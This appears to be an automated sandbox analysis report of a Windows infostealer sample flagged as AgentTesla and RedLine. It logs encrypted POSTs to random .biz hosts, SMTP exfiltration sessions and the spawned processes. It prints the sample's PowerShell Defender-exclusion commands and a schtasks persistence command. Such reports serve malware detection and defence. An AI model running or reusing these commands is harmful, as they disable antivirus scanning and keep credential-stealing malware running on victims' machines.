Jan 10, 2025 16:02:39.639908075 CET	413	IN	HTTP/1.1 200 OK Server: nginx Date: Fri, 10 Jan 2025 15:02:39 GMT Content-Type: text/html Transfer-Encoding: chunked Connection: close Set-Cookie: btst=b4308b53114d5d5b969cb62b01bb24f1\|8.46.123.189\|1736521359\|1736521359\|0\|1\|0; path=/; domain=.opowhhece.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax; Set-Cookie: snkz=8.46.123.189; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
54	192.168.2.4	50014	13.251.16.150	80	5084	C:\Windows\System32\alg.exe

Timestamp	Bytes transferred	Direction	Data
Jan 10, 2025 16:02:39.698704004 CET	355	OUT	POST /jxdmjixnumatu HTTP/1.1 Cache-Control: no-cache Connection: Keep-Alive Pragma: no-cache Host: jdhhbs.biz User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400 Content-Length: 770
Jan 10, 2025 16:02:39.698750019 CET	770	OUT	Data Raw: bc 69 43 03 10 71 66 2c f6 02 00 00 57 da 2c 3c 99 2c 7c 6d 14 3d 73 0f 03 0e 11 6c f1 24 ae d2 84 70 56 21 3d 68 99 71 dd 7a 61 8a 5b 7e 8d 6c ce 30 27 0d a8 c9 32 91 ce 91 d2 66 a5 78 4a 11 9f cc 39 ac 27 fc 51 9d b5 50 cb f6 d2 8d 34 69 79 74 Data Ascii: iCqf,W,<,\|m=sl$pV!=hqza[~l0'2fxJ9'QP4iytJ>69IbxUWnIz$862<:.O=9G4FL`kTCNR:i]kc[<l+aKpMC6XhoMWev&-H
Jan 10, 2025 16:02:41.136997938 CET	410	IN	HTTP/1.1 200 OK Server: nginx Date: Fri, 10 Jan 2025 15:02:40 GMT Content-Type: text/html Transfer-Encoding: chunked Connection: close Set-Cookie: btst=0ce54d04a423602a06b2731a581fb780\|8.46.123.189\|1736521360\|1736521360\|0\|1\|0; path=/; domain=.jdhhbs.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax; Set-Cookie: snkz=8.46.123.189; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
55	192.168.2.4	50024	34.246.200.160	80	5084	C:\Windows\System32\alg.exe

Timestamp	Bytes transferred	Direction	Data
Jan 10, 2025 16:02:41.201493979 CET	356	OUT	POST /nuxquhjmvum HTTP/1.1 Cache-Control: no-cache Connection: Keep-Alive Pragma: no-cache Host: mgmsclkyu.biz User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400 Content-Length: 770
Jan 10, 2025 16:02:41.201493979 CET	770	OUT	Data Raw: 5e 89 04 d1 1e c6 13 92 f6 02 00 00 2d 86 0b dc 3b 68 89 f2 b5 3a c7 5f 70 b4 84 7a 9c 36 3a 1e 4f 98 c7 28 a1 48 14 28 51 90 46 70 1c 80 08 68 2c 99 93 ff 50 b2 f1 ff 26 10 7c 0d 8a 5b a6 54 d9 9d 65 23 bb b3 70 f0 38 0b 93 14 6e ca a3 48 7c 38 Data Ascii: ^-;h:_pz6:O(H(QFph,P&\|[Te#p8nH\|8w6r)-s4TW3Fy?iJh0\X6&Y_3wC$4r5\%w3OJTYjedK]6I/jZ*-OrW7o4\|
Jan 10, 2025 16:02:41.936881065 CET	413	IN	HTTP/1.1 200 OK Server: nginx Date: Fri, 10 Jan 2025 15:02:41 GMT Content-Type: text/html Transfer-Encoding: chunked Connection: close Set-Cookie: btst=a62c86614c16c461fb55533b72692f86\|8.46.123.189\|1736521361\|1736521361\|0\|1\|0; path=/; domain=.mgmsclkyu.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax; Set-Cookie: snkz=8.46.123.189; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
56	192.168.2.4	50030	18.141.10.107	80	5084	C:\Windows\System32\alg.exe

Timestamp	Bytes transferred	Direction	Data
Jan 10, 2025 16:02:41.987864971 CET	357	OUT	POST /wkcytogysijgwi HTTP/1.1 Cache-Control: no-cache Connection: Keep-Alive Pragma: no-cache Host: warkcdu.biz User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400 Content-Length: 770
Jan 10, 2025 16:02:41.987900972 CET	770	OUT	Data Raw: 9d fd 47 99 c6 c2 74 e2 f6 02 00 00 de 48 9f e2 ce d1 c8 f0 5a 36 aa 54 48 dd 12 1f a5 4e ea 3d 95 3a 90 c6 6e 10 79 ba 9d 1a 51 d5 f1 a6 4c 18 74 5c 02 7a 99 7c a3 c0 95 b3 7f 4a 37 cb d8 bd 4c fc 1c b2 c7 d1 e7 87 81 6a 63 2e 46 78 55 fb 8b b8 Data Ascii: GtHZ6THN=:nyQLt\z\|J7Ljc.FxU[tU@rV&7^v[,nt:^j)@i$Q0).2IhP%!h8h7ojHP:5gmtara<s3"*a\|9aEkD

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
57	192.168.2.4	50041	18.141.10.107	80	5084	C:\Windows\System32\alg.exe

Timestamp	Bytes transferred	Direction	Data
Jan 10, 2025 16:02:43.426784039 CET	344	OUT	POST /d HTTP/1.1 Cache-Control: no-cache Connection: Keep-Alive Pragma: no-cache Host: warkcdu.biz User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400 Content-Length: 770
Jan 10, 2025 16:02:43.426806927 CET	770	OUT	Data Raw: 40 35 0a 9d 1c aa cd 2f f6 02 00 00 69 9b 80 ba 40 58 96 32 85 93 3a 7a e2 b6 05 8a 78 ad 78 8e 86 48 27 14 2a db 06 e0 0a ce 4c 04 4b d1 3f 2f 0a dc c0 cd 4a 97 44 9f e0 ad 8f d2 fe 0e 20 74 86 39 b4 6a f9 bb 28 59 eb 58 3e 4a 76 69 40 e1 ee b1 Data Ascii: @5/i@X2:zxxH'LK?/JD t9j(YX>Jvi@W(s0=ukW(RS.@DfA1p?KaZC48/gttC@(L!O,5_j"[WR$@H\|E%g41mf2P'
Jan 10, 2025 16:02:44.799875975 CET	411	IN	HTTP/1.1 200 OK Server: nginx Date: Fri, 10 Jan 2025 15:02:44 GMT Content-Type: text/html Transfer-Encoding: chunked Connection: close Set-Cookie: btst=959af797ee506165ead677457732007d\|8.46.123.189\|1736521364\|1736521364\|0\|1\|0; path=/; domain=.warkcdu.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax; Set-Cookie: snkz=8.46.123.189; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
58	192.168.2.4	50052	13.251.16.150	80	5084	C:\Windows\System32\alg.exe

Timestamp	Bytes transferred	Direction	Data
Jan 10, 2025 16:02:45.134891033 CET	354	OUT	POST /byngwhigllxva HTTP/1.1 Cache-Control: no-cache Connection: Keep-Alive Pragma: no-cache Host: gcedd.biz User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400 Content-Length: 770
Jan 10, 2025 16:02:45.135338068 CET	770	OUT	Data Raw: 8d 1f 99 cb ca bd ff 16 f6 02 00 00 da 16 80 57 e9 38 49 9c 78 f7 41 1f d6 9f ec c6 a4 df 70 bf b0 f2 97 e2 26 cd a8 35 fa 4c e8 b6 2c 2f e0 62 b3 62 81 87 ec 46 f4 14 67 10 c8 08 78 af 60 00 2d dc cb 46 4a 3b 05 06 b5 78 ee 4c fb 63 b9 71 d4 9d Data Ascii: W8IxAp&5L,/bbFgx`-FJ;xLcq%G4O"lq2;n_;R>@(w^o':9~\E0h:W+Xl\o9o:!5!6j'<PKiC\|)mjU2FN%G

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
59	192.168.2.4	50070	13.251.16.150	80	5084	C:\Windows\System32\alg.exe

Timestamp	Bytes transferred	Direction	Data
Jan 10, 2025 16:03:15.155647039 CET	343	OUT	POST /vl HTTP/1.1 Cache-Control: no-cache Connection: Keep-Alive Pragma: no-cache Host: gcedd.biz User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400 Content-Length: 770
Jan 10, 2025 16:03:15.155673981 CET	770	OUT	Data Raw: a1 8f 6e 49 02 e6 3f 96 f6 02 00 00 1e f4 df bf 2d c6 3f 8f 94 dd 1b 93 6f dd 81 06 32 15 f1 57 e7 2f 70 4b 4f 73 8e f7 70 b2 f7 84 0e 50 1c a7 46 a6 46 6f 65 9e 37 33 64 97 5f ac 59 7d dc 9d 9e 3c 0a a1 2f f7 c5 90 8a 14 ad 2e 2a 68 95 d0 93 40 Data Ascii: nI?-?o2W/pKOspPFFoe73d_Y}</.h@"\$]B:"&DB{aw'#;mie+5m o4:9O(_+"+jAa6A&@egN6JP(<y.

HTTPS Proxied Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.4	49730	104.26.13.205	443	7012	C:\Users\user\AppData\Local\Temp\neworigin.exe

Timestamp	Bytes transferred	Direction	Data
2025-01-10 15:01:27 UTC	155	OUT	GET / HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0 Host: api.ipify.org Connection: Keep-Alive
2025-01-10 15:01:28 UTC	423	IN	HTTP/1.1 200 OK Date: Fri, 10 Jan 2025 15:01:27 GMT Content-Type: text/plain Content-Length: 12 Connection: close Vary: Origin CF-Cache-Status: DYNAMIC Server: cloudflare CF-RAY: 8ffd8ae1cfe14273-EWR server-timing: cfL4;desc="?proto=TCP&rtt=1581&min_rtt=1574&rtt_var=605&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2820&recv_bytes=769&delivery_rate=1785932&cwnd=32&unsent_bytes=0&cid=b2e61191191d8f59&ts=289&x=0"
2025-01-10 15:01:28 UTC	12	IN	Data Raw: 38 2e 34 36 2e 31 32 33 2e 31 38 39 Data Ascii: 8.46.123.189

SMTP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP	Commands
Jan 10, 2025 16:01:30.898437023 CET	587	49734	51.195.88.199	192.168.2.4	220-s82.gocheapweb.com ESMTP Exim 4.97.1 #2 Fri, 10 Jan 2025 15:01:30 +0000 220-We do not authorize the use of this system to transport unsolicited, 220 and/or bulk e-mail.
Jan 10, 2025 16:01:30.905879974 CET	49734	587	192.168.2.4	51.195.88.199	EHLO 424505
Jan 10, 2025 16:01:31.083967924 CET	587	49734	51.195.88.199	192.168.2.4	250-s82.gocheapweb.com Hello 424505 [8.46.123.189] 250-SIZE 52428800 250-8BITMIME 250-PIPELINING 250-PIPECONNECT 250-STARTTLS 250 HELP
Jan 10, 2025 16:01:31.096324921 CET	49734	587	192.168.2.4	51.195.88.199	STARTTLS
Jan 10, 2025 16:01:31.274692059 CET	587	49734	51.195.88.199	192.168.2.4	220 TLS go ahead
Jan 10, 2025 16:01:35.650731087 CET	587	49738	51.195.88.199	192.168.2.4	220-s82.gocheapweb.com ESMTP Exim 4.97.1 #2 Fri, 10 Jan 2025 15:01:35 +0000 220-We do not authorize the use of this system to transport unsolicited, 220 and/or bulk e-mail.
Jan 10, 2025 16:01:35.650876045 CET	49738	587	192.168.2.4	51.195.88.199	EHLO 424505
Jan 10, 2025 16:01:35.886878967 CET	587	49738	51.195.88.199	192.168.2.4	250-s82.gocheapweb.com Hello 424505 [8.46.123.189] 250-SIZE 52428800 250-8BITMIME 250-PIPELINING 250-PIPECONNECT 250-STARTTLS 250 HELP
Jan 10, 2025 16:01:35.887095928 CET	49738	587	192.168.2.4	51.195.88.199	STARTTLS
Jan 10, 2025 16:01:36.073718071 CET	587	49738	51.195.88.199	192.168.2.4	220 TLS go ahead
Jan 10, 2025 16:03:06.959597111 CET	587	50068	51.195.88.199	192.168.2.4	220-s82.gocheapweb.com ESMTP Exim 4.97.1 #2 Fri, 10 Jan 2025 15:03:06 +0000 220-We do not authorize the use of this system to transport unsolicited, 220 and/or bulk e-mail.
Jan 10, 2025 16:03:06.960024118 CET	50068	587	192.168.2.4	51.195.88.199	EHLO 424505
Jan 10, 2025 16:03:07.177418947 CET	587	50068	51.195.88.199	192.168.2.4	250-s82.gocheapweb.com Hello 424505 [8.46.123.189] 250-SIZE 52428800 250-8BITMIME 250-PIPELINING 250-PIPECONNECT 250-STARTTLS 250 HELP
Jan 10, 2025 16:03:07.177617073 CET	50068	587	192.168.2.4	51.195.88.199	STARTTLS
Jan 10, 2025 16:03:07.362353086 CET	587	50068	51.195.88.199	192.168.2.4	220 TLS go ahead
Jan 10, 2025 16:03:08.400935888 CET	587	50069	51.195.88.199	192.168.2.4	220-s82.gocheapweb.com ESMTP Exim 4.97.1 #2 Fri, 10 Jan 2025 15:03:08 +0000 220-We do not authorize the use of this system to transport unsolicited, 220 and/or bulk e-mail.
Jan 10, 2025 16:03:08.404095888 CET	50069	587	192.168.2.4	51.195.88.199	EHLO 424505
Jan 10, 2025 16:03:08.593907118 CET	587	50069	51.195.88.199	192.168.2.4	250-s82.gocheapweb.com Hello 424505 [8.46.123.189] 250-SIZE 52428800 250-8BITMIME 250-PIPELINING 250-PIPECONNECT 250-STARTTLS 250 HELP
Jan 10, 2025 16:03:08.594217062 CET	50069	587	192.168.2.4	51.195.88.199	STARTTLS
Jan 10, 2025 16:03:08.785039902 CET	587	50069	51.195.88.199	192.168.2.4	220 TLS go ahead
Jan 10, 2025 16:03:17.491086006 CET	587	50072	51.195.88.199	192.168.2.4	220-s82.gocheapweb.com ESMTP Exim 4.97.1 #2 Fri, 10 Jan 2025 15:03:17 +0000 220-We do not authorize the use of this system to transport unsolicited, 220 and/or bulk e-mail.
Jan 10, 2025 16:03:17.491524935 CET	50072	587	192.168.2.4	51.195.88.199	EHLO 424505
Jan 10, 2025 16:03:17.670133114 CET	587	50072	51.195.88.199	192.168.2.4	250-s82.gocheapweb.com Hello 424505 [8.46.123.189] 250-SIZE 52428800 250-8BITMIME 250-PIPELINING 250-PIPECONNECT 250-STARTTLS 250 HELP
Jan 10, 2025 16:03:17.673007965 CET	50072	587	192.168.2.4	51.195.88.199	STARTTLS
Jan 10, 2025 16:03:17.851684093 CET	587	50072	51.195.88.199	192.168.2.4	220 TLS go ahead
Jan 10, 2025 16:03:37.047382116 CET	587	50073	51.195.88.199	192.168.2.4	220-s82.gocheapweb.com ESMTP Exim 4.97.1 #2 Fri, 10 Jan 2025 15:03:36 +0000 220-We do not authorize the use of this system to transport unsolicited, 220 and/or bulk e-mail.
Jan 10, 2025 16:03:37.047571898 CET	50073	587	192.168.2.4	51.195.88.199	EHLO 424505
Jan 10, 2025 16:03:37.231203079 CET	587	50073	51.195.88.199	192.168.2.4	250-s82.gocheapweb.com Hello 424505 [8.46.123.189] 250-SIZE 52428800 250-8BITMIME 250-PIPELINING 250-PIPECONNECT 250-STARTTLS 250 HELP
Jan 10, 2025 16:03:37.231394053 CET	50073	587	192.168.2.4	51.195.88.199	STARTTLS
Jan 10, 2025 16:03:37.415010929 CET	587	50073	51.195.88.199	192.168.2.4	220 TLS go ahead

Target ID:	0
Start time:	10:01:23
Start date:	10/01/2025
Path:	C:\Users\user\Desktop\RJKUWSGxej.exe
Wow64 process (32bit):	false
Commandline:	"C:\Users\user\Desktop\RJKUWSGxej.exe"
Imagebase:	0x7ff6c74f0000
File size:	2'806'272 bytes
MD5 hash:	5F573A664988C7AE35EC36F0E619728E
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	1
Start time:	10:01:23
Start date:	10/01/2025
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7699e0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	2
Start time:	10:01:24
Start date:	10/01/2025
Path:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	false
Commandline:	"C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath $env:UserProfile
Imagebase:	0x7ff788560000
File size:	452'608 bytes
MD5 hash:	04029E121A0CFA5991749937DD22A1D9
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	3
Start time:	10:01:24
Start date:	10/01/2025
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7699e0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	4
Start time:	10:01:24
Start date:	10/01/2025
Path:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
Wow64 process (32bit):
Commandline:	"C:\Windows\Microsoft.NET\Framework\v4.0.30319\regsvcs.exe"
Imagebase:
File size:	45'984 bytes
MD5 hash:	9D352BC46709F0CB5EC974633A0C3C94
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	false

Show Windows behavior

Target ID:	5
Start time:	10:01:25
Start date:	10/01/2025
Path:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe"
Imagebase:	0xfd0000
File size:	47'584 bytes
MD5 hash:	94C8E57A80DFCA2482DEDB87B93D4FD9
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000005.00000002.1896308865.0000000003840000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000005.00000002.1896308865.0000000003840000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: 00000005.00000002.1896308865.0000000003840000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
Reputation:	moderate
Has exited:	true

Show Windows behavior

Target ID:	6
Start time:	10:01:25
Start date:	10/01/2025
Path:	C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
Wow64 process (32bit):	true
Commandline:	"C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe"
Imagebase:	0x400000
File size:	1'290'240 bytes
MD5 hash:	3A91CBC10690CDD19D04F068C7B34C44
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Antivirus matches:	Detection: 100%, Avira Detection: 100%, Joe Sandbox ML
Reputation:	low
Has exited:	false

Show Windows behavior

Target ID:	7
Start time:	10:01:25
Start date:	10/01/2025
Path:	C:\Windows\System32\alg.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\System32\alg.exe
Imagebase:	0x7ff7699e0000
File size:	1'225'728 bytes
MD5 hash:	D0C2B68B793CE73C9F58FC7242DA51A1
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	low
Has exited:	false

Show Windows behavior

Target ID:	8
Start time:	10:01:25
Start date:	10/01/2025
Path:	C:\Users\user\AppData\Local\Temp\server_BTC.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\AppData\Local\Temp\server_BTC.exe"
Imagebase:	0x60000
File size:	231'936 bytes
MD5 hash:	50D015016F20DA0905FD5B37D7834823
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	moderate
Has exited:	true

Show Windows behavior

Target ID:	9
Start time:	10:01:25
Start date:	10/01/2025
Path:	C:\Windows\System32\drivers\AppVStrm.sys
Wow64 process (32bit):
Commandline:
Imagebase:
File size:	138'056 bytes
MD5 hash:	BDA55F89B69757320BC125FF1CB53B26
Has elevated privileges:
Has administrator privileges:
Programmed in:	C, C++ or other language
Reputation:	moderate
Has exited:	false

Show Windows behavior

Target ID:	10
Start time:	10:01:25
Start date:	10/01/2025
Path:	C:\Windows\System32\drivers\AppvVemgr.sys
Wow64 process (32bit):
Commandline:
Imagebase:
File size:	174'408 bytes
MD5 hash:	E70EE9B57F8D771E2F4D6E6B535F6757
Has elevated privileges:
Has administrator privileges:
Programmed in:	C, C++ or other language
Reputation:	moderate
Has exited:	false

Show Windows behavior

Target ID:	11
Start time:	10:01:25
Start date:	10/01/2025
Path:	C:\Windows\System32\drivers\AppvVfs.sys
Wow64 process (32bit):
Commandline:
Imagebase:
File size:	154'952 bytes
MD5 hash:	2CBABD729D5E746B6BD8DC1B4B4DB1E1
Has elevated privileges:
Has administrator privileges:
Programmed in:	C, C++ or other language
Has exited:	false

Show Windows behavior

Target ID:	12
Start time:	10:01:25
Start date:	10/01/2025
Path:	C:\Windows\System32\AppVClient.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\AppVClient.exe
Imagebase:	0x140000000
File size:	1'348'608 bytes
MD5 hash:	CB68C66813352D55FED8EE293621ED26
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	13
Start time:	10:01:25
Start date:	10/01/2025
Path:	C:\Users\user\AppData\Local\Temp\neworigin.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\AppData\Local\Temp\neworigin.exe"
Imagebase:	0xad0000
File size:	250'368 bytes
MD5 hash:	D6A4CF0966D24C1EA836BA9A899751E5
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000000D.00000002.3160951501.0000000002FA1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 0000000D.00000002.3160951501.0000000002FA1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000000D.00000000.1890742051.0000000000AD2000.00000002.00000001.01000000.00000008.sdmp, Author: Joe Security Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 0000000D.00000000.1890742051.0000000000AD2000.00000002.00000001.01000000.00000008.sdmp, Author: Joe Security Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 0000000D.00000002.3160951501.0000000002FC9000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: C:\Users\user\AppData\Local\Temp\neworigin.exe, Author: Joe Security Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: C:\Users\user\AppData\Local\Temp\neworigin.exe, Author: Joe Security Rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID, Description: Detects executables referencing Windows vault credential objects. Observed in infostealers, Source: C:\Users\user\AppData\Local\Temp\neworigin.exe, Author: ditekSHen
Has exited:	false

Show Windows behavior

Target ID:	14
Start time:	10:01:26
Start date:	10/01/2025
Path:	C:\Users\user\AppData\Local\Temp\build.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\AppData\Local\Temp\build.exe"
Imagebase:	0xc80000
File size:	307'712 bytes
MD5 hash:	3B6501FEEF6196F24163313A9F27DBFD
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: 0000000E.00000000.1892134419.0000000000C82000.00000002.00000001.01000000.00000009.sdmp, Author: Joe Security Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: C:\Users\user\AppData\Local\Temp\build.exe, Author: Joe Security Rule: infostealer_win_redline_strings, Description: Finds Redline samples based on characteristic strings, Source: C:\Users\user\AppData\Local\Temp\build.exe, Author: Sekoia.io
Has exited:	false

Show Windows behavior

Target ID:	18
Start time:	10:01:28
Start date:	10/01/2025
Path:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	true
Commandline:	"powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\ACCApi'
Imagebase:	0x8f0000
File size:	433'152 bytes
MD5 hash:	C32CA4ACFCC635EC1EA6ED8A34DF5FAC
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	19
Start time:	10:01:28
Start date:	10/01/2025
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7699e0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	20
Start time:	10:01:28
Start date:	10/01/2025
Path:	C:\Windows\SysWOW64\schtasks.exe
Wow64 process (32bit):	true
Commandline:	"schtasks.exe" /create /tn AccSys /tr "C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe" /st 10:06 /du 23:59 /sc daily /ri 1 /f
Imagebase:	0x360000
File size:	187'904 bytes
MD5 hash:	48C2FE20575769DE916F48EF0676A965
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	21
Start time:	10:01:28
Start date:	10/01/2025
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7699e0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	22
Start time:	10:01:29
Start date:	10/01/2025
Path:	C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe"
Imagebase:	0xd60000
File size:	231'936 bytes
MD5 hash:	50D015016F20DA0905FD5B37D7834823
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	false

Show Windows behavior

Target ID:	23
Start time:	10:01:29
Start date:	10/01/2025
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\tmpFD8B.tmp.cmd""
Imagebase:	0x240000
File size:	236'544 bytes
MD5 hash:	D0FCE3AFA6AA1D58CE9FA336CC2B675B
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	24
Start time:	10:01:30
Start date:	10/01/2025
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7699e0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	25
Start time:	10:01:30
Start date:	10/01/2025
Path:	C:\Windows\SysWOW64\timeout.exe
Wow64 process (32bit):	true
Commandline:	timeout 6
Imagebase:	0x330000
File size:	25'088 bytes
MD5 hash:	976566BEEFCCA4A159ECBDB2D4B1A3E3
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	26
Start time:	10:01:31
Start date:	10/01/2025
Path:	C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe
Wow64 process (32bit):	true
Commandline:	C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe
